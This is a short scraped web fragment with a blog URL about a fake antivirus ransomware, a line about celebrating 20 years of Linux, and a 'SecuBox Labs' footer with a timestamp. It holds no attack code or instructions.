source: http://malwaredisasters.blogspot.com/2010/09/microsoft-security-antivirus-ransomware.html

I'll be celebrating 20 years of Linux with The Linux Foundation!

SecuBox Labs (2001-2012)
Requête: 14.02.12 à 07:54:10